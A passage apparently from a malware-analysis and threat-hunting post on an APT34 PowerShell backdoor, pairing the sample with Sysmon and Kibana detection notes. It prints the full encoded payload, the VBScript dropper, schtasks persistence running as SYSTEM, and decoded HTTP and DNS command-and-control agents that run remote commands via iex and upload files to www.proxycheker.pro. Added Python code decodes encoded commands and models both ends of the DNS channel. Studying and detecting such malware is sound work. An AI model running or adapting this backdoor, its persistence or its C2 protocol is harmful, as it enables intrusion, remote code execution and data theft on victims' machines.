${global:$http_ag} = "JABzAHIAdgByACAAPQAgACIAaAB0AHQAcAA6AFwAXAAiACAAKwAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEQAbgBzAF0AOgA6AEcAZQB0AEgAbwBzAHQAQQBkAGQAcgBlAHMAcwBlAHMAKAAiAHcAdwB3AC4AcAByAG8AeAB5AGMAaABlAGsAZQByAC4AcAByAG8AIgApACAAKwAiAC8AdQBwAGQAYQB0AGUAXwB3AGEAcABwAC4AYQBzAHAAeAAiADsADQAKACQAawA9AGcAZQB0AG0AYQBjACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAB8ACAAJQB7ACAAJABfACAALQBtAGEAdABjAGgAIAAnACgAPwA6AFsAMAAtADkAYQAtAGYAXQB7ADIAfQBbADoALQBdACkAewA1AH0AWwAwAC0AOQBhAC0AZgBdAHsAMgB9ACcAIAB9ADsADQAKAGkAZgAoACQAawApAHsAJAB7AGcAbABvAGIAYQBsADoAJABhAGkAZAB9ACAAPQAgACQAbQBhAHQAYwBoAGUAcwBbADAAXQAgAC0AcgBlAHAAbABhAGMAZQAgACIALQAiACwAIAAiACIAOwB9ACAAZQBsAHMAZQAgAHsAJAB7AGcAbABvAGIAYQBsADoAJABhAGkAZAB9ACAAPQAgAHcAaABvAGEAbQBpACAAfAAgACUAewBbAGIAeQB0AGUAWwBdAF0AWwBjAGgAYQByAFsAXQBdACQAXwAgAC0AagBvAGkAbgAgACcAJwB9ACAAIAB8ACAAJQB7ACQAXwAuAHMAdQBiAHMAdAByAGkAbgBnACgAMAAsADEAMQApAH0AIAB8ACAAJQB7ACQAXwAgACsAIAAiADEAMgAwADEAMgAwADAAMQAxADIAMgA0ACIAfQAgAHwAIAAlAHsAJABfAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAwACwAMQAxACkAfQB9AA0ACgAkAHsAZwBsAG8AYgBhAGwAOgAkAHIAUABhAHQAaAB9ACAAPQAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAIAArACAAIgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEoAYQB2AGEAXAAiACAAKwAgACQAewBnAGwAbwBiAGEAbAA6ACQAYQBpAGQAfQA7AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABzAG4AZAByAA0ACgB7AA0ACgAJAHAAYQByAGEAbQAoACQAZgBuAGEAbQBlACwAIAAkAGMAbgB0ACkADQAKAAkAJABhAGQAcgAgAD0AIABhAGQAcgBDAHQAIAAiACQAZgBuAGEAbQBlACIAIAAiADIAIgANAAoACQAkAHsAZwBsAG8AYgBhAGwAOgAkAHcAYwB9AC4AVQBwAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGEAZAByACwAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBEAGUAZgBhAHUAbAB0AC4ARwBlAHQAQgB5AHQAZQBzACgAJABjAG4AdAApACkAKQA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABhAGQAcgBDAHQADQAKAHsADQAKAAkAcABhAHIAYQBtACAAKAAkAHIAaQBkAEkAbgAsACAAJABhAGMAKQANAAoACQAkAGMAcgAgAD0AIABAACgAKQA7AA0ACgAJACQAZABhAHIAIAA9ACAAQAAoACkAOwANAAoACQAkAGQAYQByACAAPQAgAC0AagBvAGkAbgAgACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ASQ
BuAHAAdQB0AE8AYgBqAGUAYwB0ACAAKAAwACAALgAuACAAOQApACAALQBDAG8AdQBuAHQAIAAxADUAKQA7AA0ACgAJACQAYwByACAAPQAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACgAMAAgAC4ALgAgADkAKQAgAC0AQwBvAHUAbgB0ACAAMgA7AA0ACgAJACQAZABhAHIAIAA9ACAAJABkAGEAcgAuAEkAbgBzAGUAcgB0ACgAJABjAHIAWwAwAF0ALAAgACQAcgBpAGQASQBuAC4AVAByAGkAbQAoACkAKQAuAEkAbgBzAGUAcgB0ACgAKAAkAGMAcgBbADEAXQApACwAIAAkAHsAZwBsAG8AYgBhAGwAOgAkAGEAaQBkAH0AKQA7AA0ACgAJACQAYQBkAHIAIAA9ACAAIgAkACgAJABzAHIAdgByACkAPwB2AGUAcgBzAGkAbwBuAD0AJAAoACQAZABhAHIAKQA1ACQAKAAkAGEAYwApADcAJAAoACQAYwByAFsAMABdACkAJAAoACQAYwByAFsAMQBdACkAIgA7AA0ACgAJAHIAZQB0AHUAcgBuACAAJABhAGQAcgA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABsAGQAQwBmAGcADQAKAHsADQAKAAkAJABjAGYAZwBBAGQAcgAgAD0AIAAkAGUAbgB2ADoAVABNAFAAIAArACAAIgBcAGMAZgBnAC4AaQBuAGkAIgA7AA0ACgAJAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAoACQAYwBmAGcAQQBkAHIAKQApAA0ACgAJAHsADQAKAAkACQAkAGwAaQBuAGUAcwAgAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAgACgAJABjAGYAZwBBAGQAcgApACAAfAAgAFcAaABlAHIAZQAgAHsAIAAkAF8AIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAXgBcAHMAKwAkACcAIAB9AA0ACgAJAAkAZgBvAHIAZQBhAGMAaAAgACgAJABsAGkAbgBlACAAaQBuACAAJABsAGkAbgBlAHMAKQANAAoACQAJAHsADQAKAAkACQAJACQAYQAgAD0AIAAkAGwAaQBuAGUAIAAtAHMAcABsAGkAdAAgACcALAAnAA0ACgAJAAkACQBzAHcAaQB0AGMAaAAgACgAJABhAFsAMABdACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAIgB1AHMAcgAiAHsAIAAkAFAAVQBzAGUAcgAgAD0AIAAkAGEAWwAxAF0AIAArACAAIgAiADsAIAB9AA0ACgAJAAkACQAJACIAcABhAHMAIgB7ACAAJABQAFAAYQBzAHMAIAA9ACAAJABhAFsAMQBdACAAKwAgACIAIgA7ACAAfQANAAoACQAJAAkACQAiAHUAcwBlACIAewAgACQAUABVAHMAZQAgAD0AIAAkAGEAWwAxAF0AIAArACAAIgAiADsAIAB9AA0ACgAJAAkACQAJACIAcwByAHYAIgB7ACAAJABQAFMAZQByAHYAZQByACAAPQAgACQAYQBbADEAXQAgACsAIAAiACIAOwAgAH0ADQAKAAkACQAJAAkAIgBwAHIAdAAiAHsAIAAkAFAAUABvAHIAdAAgAD0AIAAkAGEAWwAxAF0AIAArACAAIgAiADsAIAB9AA0ACgAJAAkACQAJACIAZABvAG0AIgB7ACAAJABQAEQAbwBtACAAPQAgACQAYQBbADEAXQAgACsAIAAiACIAOwAgAH0ADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAFAAUwBlAHIAdgBlAHIAIAAtAGEAbgBkACAAJABQAFUAcwBlACAALQBlAHEAIAAiAHQAIgApAA0ACgAJAHsADQ
AKAAkACQAkAHUAcgBpACAAPQAgACIAaAB0AHQAcAA6AC8ALwAiACAAKwAgACQAUABTAGUAcgB2AGUAcgAgACsAIAAiADoAIgAgACsAIAAkAFAAUABvAHIAdAA7AA0ACgAJAAkAJABwAHIAbwB4AHkAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAKAAkAHUAcgBpACwAIAAkAHQAcgB1AGUAKQA7AA0ACgAJAAkAJABwAHIAbwB4AHkALgBjAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAAkAFAAVQBzAGUAcgAsACAAJABQAFAAYQBzAHMALAAgACQAUABEAG8AbQApAA0ACgAJAAkAJAB7AGcAbABvAGIAYQBsADoAJAB3AGMAfQAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsADQAKAAkACQAkAHsAZwBsAG8AYgBhAGwAOgAkAHcAYwB9AC4AcAByAG8AeAB5ACAAPQAgACQAcAByAG8AeAB5ADsADQAKAAkAfQANAAoACQBlAGwAcwBlAA0ACgAJAHsADQAKAAkACQAkAHsAZwBsAG8AYgBhAGwAOgAkAHcAYwB9ACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABzAHkAcwB0AGUAbQAuAG4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwANAAoACQB9AA0ACgB9AA0ACgBsAGQAQwBmAGcAOwANAAoAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAewBnAGwAbwBiAGEAbAA6ACQAcgBQAGEAdABoAH0AKQApACAAewAgAE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAFAAYQB0AGgAIAAkAHsAZwBsAG8AYgBhAGwAOgAkAHIAUABhAHQAaAB9ADsAIAB9AA0ACgAkAGEAZAByACAAPQAgAGEAZAByAEMAdAAgACIAMgA0ADMANQAxADIANAAzADUAMQAwACIAIAAiADAAIgANAAoAJAByAGkAZAAgAD0AIAAoACQAewBnAGwAbwBiAGEAbAA6ACQAdwBjAH0ALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGEAZAByACkAIAArACAAIgAgACIAKQAuAFQAcgBpAG0AKAApADsADQAKAGkAZgAgACgAJAByAGkAZAApAA0ACgB7AA0ACgAJAGkAZgAgACgAJAByAGkAZAAuAGwAZQBuAGcAdABoACAALQBlAHEAIAAxADEAKQANAAoACQB7AA0ACgAJAAkAJABhAGQAcgAgAD0AIABhAGQAcgBDAHQAIAAiACQAcgBpAGQAIgAgACIAMQAiAA0ACgAJAAkAJAByACAAPQAgACQAewBnAGwAbwBiAGEAbAA6ACQAdwBjAH0ALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGEAZAByACkAOwANAAoACQAJACQAcgBjAG4AdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBEAGUAZgBhAHUAbAB0AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdA
ByAGkAbgBnACgAJAByACkAKQA7AA0ACgAJAAkAJABhAGQAcgAgAD0AIABhAGQAcgBDAHQAIAAiACQAcgBpAGQAIgAgACIAMwAiAA0ACgAJAAkAJAB7AGcAbABvAGIAYQBsADoAJAB3AGMAfQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACQAYQBkAHIAKQA7AA0ACgAJAAkAaQBmACAAKAAkAHIAaQBkAC4ARQBuAGQAcwBXAGkAdABoACgAIgAwACIAKQApAA0ACgAJAAkAewANAAoACQAJAAkAJAByAGMAbgB0ACAAPQAgACQAcgBjAG4AdAAgAHwAIAA/ACAAewAgACQAXwAuAHQAcgBpAG0AKAApACAALQBuAGUAIAAiACIAIAB9ADsADQAKAAkACQAJACQAcgBlAHMAIAArAD0AIAAkAHIAYwBuAHQALgBTAHAAbABpAHQAKAAiACYAIgApACAAfAAgAGYAbwByAGUAYQBjAGgALQBvAGIAagBlAGMAdAAgAHsAIAAkAF8AIAB8ACAAaQBlAHgAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgAH0ADQAKAAkACQBzAG4AZAByACAAJAByAGkAZAAgACQAcgBlAHMADQAKAAkACQB9AA0ACgAJAAkAZQBsAHMAZQBpAGYAIAAoACQAcgBpAGQALgBFAG4AZABzAFcAaQB0AGgAKAAiADEAIgApACkADQAKAAkACQB7AA0ACgAJAAkACQAkAGEAZAByACAAPQAgACQAcgBjAG4AdAAuAFQAcgBpAG0AKAApADsADQAKAAkACQAJAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGEAZAByACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJABhAGQAcgBTACAAPQAgAGEAZAByAEMAdAAgACIAJAByAGkAZAAiACAAIgA0ACIADQAKAAkACQAJAAkAJAB7AGcAbABvAGIAYQBsADoAJAB3AGMAfQAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAkAGEAZAByAFMALAAgACQAYQBkAHIAKQA7AA0ACgAJAAkACQB9AA0ACgAJAAkACQBlAGwAcwBlAA0ACgAJAAkACQB7AA0ACgAJAAkACQAJAHMAbgBkAHIAIAAkAHIAaQBkACAAIgA0ADAANAAiADsADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAAkAZQBsAHMAZQBpAGYAIAAoACQAcgBpAGQALgBFAG4AZABzAFcAaQB0AGgAKAAiADIAIgApACkADQAKAAkACQB7AA0ACgAJAAkACQAkAHMAYQB2AEEAZAByACAAPQAgACIAJAB7AGcAbABvAGIAYQBsADoAJAByAFAAYQB0AGgAfQBcACQAcgBpAGQAIgA7AA0ACgAJAAkACQAkAHIAYwBuAHQAIAB8ACAAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABzAGEAdgBBAGQAcgA7AA0ACgAJAAkACQBzAG4AZAByACAAJAByAGkAZAAgACIAMgAwADAAPAA+ACQAcwBhAHYAQQBkAHIAIgA7AA0ACgAJAAkAfQANAAoACQB9AA0ACgB9AA0ACgA=";
function runByVBS
{
if (-not (Test-Path -Path ${global:$address1}))
{md ${global:$address1}}
if (Test-Path -Path ${global:$address1})
{
"set Shell0 = CreateObject(`"wscript.shell`")`nShell0.run `"powershell.exe -exec bypass -enc " + ${global:$http_ag} + "`", 0, false`nset Shell1 = CreateObject(`"wscript.shell`")`nShell1.run `"powershell.exe -exec bypass -enc " + ${global:$dns_ag} + "`", 0, false" | Out-File "${global:$address1}\GoogleUpdateTasks.vbs"
schtasks /create /F /sc minute /mo 1 /tn "\UpdateTasks\JavaUpdatesTasksHosts" /tr "wscript /b \`"${global:$address1}\GoogleUpdateTasks.vbs\`"";
schtasks /create /F /ru SYSTEM /sc minute /mo 1 /tn "\UpdateTasks\JavaUpdatesTasksHosts" /tr "wscript /b \`"${global:$address1}\GoogleUpdateTasks.vbs\`"";
}
}
runByVBS;

This PowerShell script carries two base64 encoded strings, ${global:$dns_ag} and ${global:$http_ag}. It writes a new VBScript, GoogleUpdateTasks.vbs, that embeds both strings (shown in the next section), and then calls schtasks to register a scheduled task, \UpdateTasks\JavaUpdatesTasksHosts, that runs the VBScript through wscript /b every minute. Note that it registers the task twice: first as the current user and then again with /ru SYSTEM, which only succeeds when the script is already running elevated (the /F flag makes the second registration overwrite the first). That scheduled task is shown in the following figure:

Task Schedule 2

And in Kibana, your relevant document should look like the following:

schtasks.exe

In the figure above, the parent image is powershell.exe and its command line is the execution of the rUpdateChecker.ps1 script; the child process being recorded is schtasks.exe registering the task. Next, we inspect the VBScript file GoogleUpdateTasks.vbs and its functionality.

Trojan Dropper

File Characteristics

Filename: GoogleUpdateTasks.vbs
MD5 Hash: f0b278427c8841c5d1a79ed2631b1522

The VBScript GoogleUpdateTasks.vbs contains the following:

set Shell0 = CreateObject("wscript.shell")
Shell0.run "powershell.exe -exec bypass -enc ...", 0, false
set Shell1 = CreateObject("wscript.shell")
Shell1.run "powershell.exe -exec bypass -enc ...", 0, false

Essentially, every time the scheduled task (described in the previous section) fires, this VBScript launches two hidden powershell.exe processes (window style 0, without waiting for them to return), each with -exec bypass and -EncodedCommand (-enc) followed by one of the base64 strings. -EncodedCommand expects the script encoded as UTF-16LE and then base64, which is why the strings are full of "A" characters (the zero high bytes). Decoding them is straightforward; the first string (${global:$http_ag}, launched via Shell0) decodes to the following code:

powershell.exe -exec bypass -enc JABzAHIA....
-------------
$srvr = "http:\\" + [System.Net.Dns]::GetHostAddresses("www.proxycheker.pro") +"/update_wapp.aspx";
$k=getmac | Out-String | %{ $_ -match '(?:[0-9a-f]{2}[:-]){5}[0-9a-f]{2}' };
if($k){${global:$aid} = $matches[0] -replace "-", "";} else {${global:$aid} = whoami | %{[byte[]][char[]]$_ -join ''} | %{$_.substring(0,11)} | %{$_ + "120120011224"} | %{$_.substring(0,11)}}
${global:$rPath} = $env:ProgramData + "\Windows\Microsoft\Java\" + ${global:$aid};
function sndr
{
param($fname, $cnt)
$adr = adrCt "$fname" "2"
${global:$wc}.UploadString($adr, [System.Convert]::ToBase64String([System.Text.Encoding]::Default.GetBytes($cnt)));
}
function adrCt
{
param ($ridIn, $ac)
$cr = @();
$dar = @();
$dar = -join (Get-Random -InputObject (0 .. 9) -Count 15);
$cr = Get-Random -InputObject (0 .. 9) -Count 2;
$dar = $dar.Insert($cr[0], $ridIn.Trim()).Insert(($cr[1]), ${global:$aid});
$adr = "$($srvr)?version=$($dar)5$($ac)7$($cr[0])$($cr[1])";
return $adr;
}
function ldCfg
{
$cfgAdr = $env:TMP + "\cfg.ini";
if (Test-Path -Path ($cfgAdr))
{
$lines = Get-Content ($cfgAdr) | Where { $_ -notmatch '^\s+$' }
foreach ($line in $lines)
{
$a = $line -split ','
switch ($a[0])
{
"usr"{ $PUser = $a[1] + ""; }
"pas"{ $PPass = $a[1] + ""; }
"use"{ $PUse = $a[1] + ""; }
"srv"{ $PServer = $a[1] + ""; }
"prt"{ $PPort = $a[1] + ""; }
"dom"{ $PDom = $a[1] + ""; }
}
}
}
if ($PServer -and $PUse -eq "t")
{
$uri = "http://" + $PServer + ":" + $PPort;
$proxy = new-object System.Net.WebProxy($uri, $true);
$proxy.credentials = new-object System.Net.NetworkCredential($PUser, $PPass, $PDom)
${global:$wc} = new-object system.net.WebClient;
${global:$wc}.proxy = $proxy;
}
else
{
${global:$wc} = new-object system.net.WebClient;
}
}
ldCfg;
if (-not (Test-Path -Path ${global:$rPath})) { New-Item -ItemType Directory -Path ${global:$rPath}; }
$adr = adrCt "24351243510" "0"
$rid = (${global:$wc}.DownloadString($adr) + " ").Trim();
if ($rid)
{
if ($rid.length -eq 11)
{
$adr = adrCt "$rid" "1"
$r = ${global:$wc}.DownloadString($adr);
$rcnt = [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String($r));
$adr = adrCt "$rid" "3"
${global:$wc}.DownloadString($adr);
if ($rid.EndsWith("0"))
{
$rcnt = $rcnt | ? { $_.trim() -ne "" };
$res += $rcnt.Split("&") | foreach-object { $_ | iex | Out-String }
sndr $rid $res
}
elseif ($rid.EndsWith("1"))
{
$adr = $rcnt.Trim();
if (Test-Path -Path $adr)
{
$adrS = adrCt "$rid" "4"
${global:$wc}.UploadFile($adrS, $adr);
}
else
{
sndr $rid "404";
}
}
elseif ($rid.EndsWith("2"))
{
$savAdr = "${global:$rPath}\$rid";
$rcnt | Set-Content -Path $savAdr;
sndr $rid "200<>$savAdr";
}
}
}

I won't go through this script line by line, but the first line already makes its purpose clear: it resolves www.proxycheker.pro and builds the URL http://<resolved address>/update_wapp.aspx (note the literal "http:\\" in the source). According to FireEye, this domain is APT34 command-and-control (C2); at the time of writing it appears to be offline. The rest of the script derives an agent id from the host's MAC address (falling back to the user name), optionally loads proxy settings from %TMP%\cfg.ini, polls the C2 for an 11-character request id ($rid) and then dispatches on its last digit: 0 runs the base64-decoded content through iex and posts the output back with sndr, 1 uploads the file whose path is given in the content, and 2 writes the content to disk under %ProgramData%\Windows\Microsoft\Java\<agent id>. If you are also shipping PowerShell Script Block Logging (the Microsoft-Windows-PowerShell/Operational channel) to Elasticsearch, the decoded script shows up under event ID 4104, as shown below:

event_id_4104
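Sysmon event ID 1 gives you the raw -enc argument, and event ID 4104 gives you the decoded block only if Script Block Logging is enabled; the decoding step itself is cheap to do yourself. The following is an added example (not code from the original post or from the malware) that decodes the -EncodedCommand argument out of a Sysmon CommandLine the way powershell.exe does (base64, then UTF-16LE) and flags the launch chain described in the last two sections: the one-minute schtasks registration and the download-and-iex stage. The three event records, the c2.example.invalid domain, the file paths and the indicator list are constructed for the example; the encoded payload is a harmless stand-in, not the APT34 string.

```python
import base64
import re

# Added example (not from the original post): decode the -EncodedCommand
# argument seen in a Sysmon event ID 1 CommandLine and triage the result.
# powershell.exe -enc expects base64 of the script in UTF-16LE, which is why
# the encoded strings in the post are full of "A" characters.

ENC_RE = re.compile(r"(?i)(?:-encodedcommand|-enc|-ec|-e)\s+([A-Za-z0-9+/=]{8,})")

# Strings worth flagging in a command line or decoded block. These are
# assumptions for the example, modelled on the scripts discussed in the post.
INDICATORS = (
    r"\bDownloadString\b", r"\bUploadString\b", r"\bUploadFile\b",
    r"\biex\b", r"\bInvoke-Expression\b", r"GetHostAddresses",
    r"\bschtasks\b", r"-exec(?:utionpolicy)?\s+bypass", r"/sc\s+minute\s+/mo\s+1\b",
)

def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(command_line: str):
    """Return the decoded script block from a -enc argument, or None if absent/invalid."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(event):
    """Decode a Sysmon event 1 record (dict with 'CommandLine') and list matched indicators."""
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    haystack = cmd + "\n" + (decoded or "")
    hits = sorted({p for p in INDICATORS if re.search(p, haystack, re.IGNORECASE)})
    return {"decoded": decoded, "indicators": hits}

# Constructed stand-in for the HTTP stage, pointing at a reserved test domain.
STAGE_SCRIPT = (
    '$srvr = "http:\\\\" + [System.Net.Dns]::GetHostAddresses("c2.example.invalid") + "/update_wapp.aspx"; '
    '$wc = New-Object System.Net.WebClient; $wc.DownloadString($srvr) | iex'
)

# Constructed sample events in the order the chain runs (paths are placeholders).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'schtasks /create /F /sc minute /mo 1 /tn "\UpdateTasks\JavaUpdatesTasksHosts" /tr "wscript /b \"C:\ProgramData\GoogleUpdateTasks.vbs\""'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -exec bypass -enc " + encode_powershell(STAGE_SCRIPT)},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["Image"], "->", triage(ev)["indicators"])
```

The regex only accepts the base64 alphabet and the decoder rejects anything that is not valid UTF-16LE, so a malformed or truncated argument yields None rather than garbage; when that happens on a real host, fall back to the 4104 record, which carries the script as PowerShell actually parsed it.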

The second base64 string (${global:$dns_ag}, launched via Shell1) decodes to the following code. Rather than HTTP, it uses DNS: it resolves names under proxycheker.pro and treats the four octets of each A-record answer as data, which makes it a fallback channel that only needs outbound DNS resolution to work:

powershell.exe -exec bypass -enc aQBmAC...
----------
if ((Get-WmiObject Win32_Process -Filter ("Name='powershell.exe' AND CommandLine LIKE '%"+$MyInvocation.MyCommand.Name.Trim()+"%'")).length -lt 2) {
$aid=whoami | %{[byte[]][char[]]$_ -join ''} | %{$_.substring(0,12)} | %{$_ + "120120011224"} | %{$_.substring(0,12)};$sp = $env:TEMP;
$sm = $false;$ct = 0;$fb = @();$rn = "000";$ac = "0";$run = $true;$ec=0;
While ($run){Start-Sleep -m 200;
if($ec -ge 5){exit}
if ($ct -lt 10) { $rn = "00$($ct)"; }elseif ($ct -lt 100) { $rn = "0$($ct)"; }else { $rn = "$($ct)"; }
$rand = -join (Get-Random -InputObject (10 .. 99) -Count (%{ Get-Random -InputObject (1 .. 6) }));
try{$lastAddress= "$($rand)$($ac)$($rn)7$($aid).proxycheker.pro";
$rt = [System.Net.Dns]::GetHostAddresses($lastAddress);}catch{$ec++;continue;}
$result = $rt[0].IPAddressToString;$rs = $result.Split('.');
if (($rs[0] -eq 1) -and ($rs[1] -eq 2) -and ($rs[2] -eq 3)){$sm = $false;$ac = "0";
$le = $fb.Length;if ($fb[$len-1] -eq 0 -and $fb[$len-2] -eq 0)
{$fbt = $fb[0 .. ($le - 3)];}elseif ($fb[$le - 1] -eq 0){$fbt = $fb[0 .. ($le - 2)];}else{$fbt = $fb;}
[System.IO.File]::WriteAllBytes($sp, $fbt);$fb = @();$ct = 0;break;}
if ($sm){if ($ct -gt 250) {$ct = 0;}
if ($ct -eq $rs[3]){$fb += $rs[0];$fb += $rs[1];$fb += $rs[2];$ct = $ct + 3;}}
if (($rs[0] -eq 24) -and ($rs[1] -eq 125)){$sp += "\" + $rs[2] + "" + $rs[3];$sm = $true;$ac = "1";$ct = 0;}
if (($rs[0] -eq 11) -and ($rs[1] -eq 24) -and ($rs[2] -eq 237) -and ($rs[3] -eq 110)) {$run=$false;break;}}
if ((Get-Item $sp).length -gt 0kb){
if ($sp.EndsWith("0"))
{
$fc = Get-Content $sp | ? { $_.trim() -ne "" };
$re += $fc.Split("&") | foreach-object { $_ | iex | Out-String }
}
elseif ($sp.EndsWith("1"))
{
Move-Item -path $sp -destination ($sp+".ps1") -Force;
}
elseif ($sp.EndsWith("2"))
{
Move-Item -path $sp -destination ($sp+".vbs") -Force;
}
}
}

And, this is how you would see it under event ID 4104:

event_id_4104_2
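The DNS script above is a small state machine, and its protocol is worth seeing end to end: the query name carries a random prefix, a one-digit channel state, the three-digit byte offset the agent expects next and the agent id; an answer of 24.125.X.Y opens a file named "XY" under %TEMP%, each following answer a.b.c.d delivers three bytes a, b, c when d equals the expected offset, any 1.2.3.x answer closes the file (stripping up to two zero padding bytes), and 11.24.237.110 tells the agent to stop. The last character of the file name selects what happens to it: 0 runs it through iex, 1 renames it to .ps1, 2 renames it to .vbs. The following is an added example (not code from the original post or from the malware) that models both ends of that channel in Python so they can be checked against each other offline. The domain c2.example.invalid, the agent id and the payloads are constructed; nothing is resolved.

```python
import random

# Added example (not from the original post): a model of the DNS A-record
# channel used by the second script, with the server side (encoding a file as
# answers) and the client side (the agent's state machine), run offline.

END_OF_FILE = (1, 2, 3, 0)        # any 1.2.3.x answer closes the transfer
TERMINATE = (11, 24, 237, 110)    # tells the agent to stop polling
FILE_START = (24, 125)            # 24.125.X.Y: start a file named "<X><Y>"

def query_name(ac: str, ct: int, aid: str, domain: str = "c2.example.invalid") -> str:
    """Build the label the agent looks up: <random digits><ac><3-digit ct>7<aid>.<domain>.
    ac is "0" while idle and "1" while receiving; ct is the offset the agent
    expects next, so the server knows which chunk to answer with."""
    rand = "".join(str(random.randint(10, 99)) for _ in range(random.randint(1, 6)))
    return f"{rand}{ac}{ct:03d}7{aid}.{domain}"

def server_answers(name_suffix: str, payload: bytes):
    """Server side: encode a file as the sequence of A-record answers the agent expects."""
    assert len(name_suffix) == 2 and name_suffix.isdigit()
    answers = [(FILE_START[0], FILE_START[1], int(name_suffix[0]), int(name_suffix[1]))]
    data = payload + b"\x00" * (-len(payload) % 3)   # pad to whole 3-byte chunks
    ct = 0
    for i in range(0, len(data), 3):
        if ct > 250:            # mirror the agent's counter wrap (offset must fit an octet)
            ct = 0
        answers.append((data[i], data[i + 1], data[i + 2], ct))
        ct += 3
    answers.append(END_OF_FILE)
    return answers

def agent_receive(answers):
    """Client side: replay the script's state machine over a list of A-record
    answers and return (file name suffix, file bytes), or None if terminated."""
    sm, ct, fb, name = False, 0, bytearray(), ""
    for rs in answers:
        if rs[:3] == (1, 2, 3):              # end of file: drop zero padding, "write" it
            if len(fb) >= 2 and fb[-1] == 0 and fb[-2] == 0:
                fb = fb[:-2]
            elif len(fb) >= 1 and fb[-1] == 0:
                fb = fb[:-1]
            return name, bytes(fb)
        if sm:
            if ct > 250:
                ct = 0
            if ct == rs[3]:                  # only the chunk at the expected offset is taken
                fb.extend(rs[:3])
                ct += 3
        if rs[:2] == FILE_START:
            name, sm, ct = f"{rs[2]}{rs[3]}", True, 0
        if rs == TERMINATE:
            return None
    return None

def dispatch(name: str):
    """What the agent does with a finished file, keyed on the last character of its name."""
    return {"0": "iex", "1": "rename to .ps1", "2": "rename to .vbs"}.get(name[-1])

if __name__ == "__main__":
    # Constructed payload; "10" ends in 0, so the agent would pipe it to iex.
    answers = server_answers("10", b"Write-Output 'hello'")
    print(query_name("1", 0, "123456789012"))
    print(agent_receive(answers), dispatch("10"))
```

Two properties of the channel follow directly from the model: the offset only fits in one octet, so the counter wraps at 250 and long files rely on answers arriving in order; and the padding rule is lossy, since a file whose real length is a multiple of three and ends in a zero byte loses that byte. For detection, the query shape is the useful part: a steady stream of lookups every 200 ms for long, all-digit labels under one registered domain, with an answer space that includes 24.125.0.0/16 and 1.2.3.0/24.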

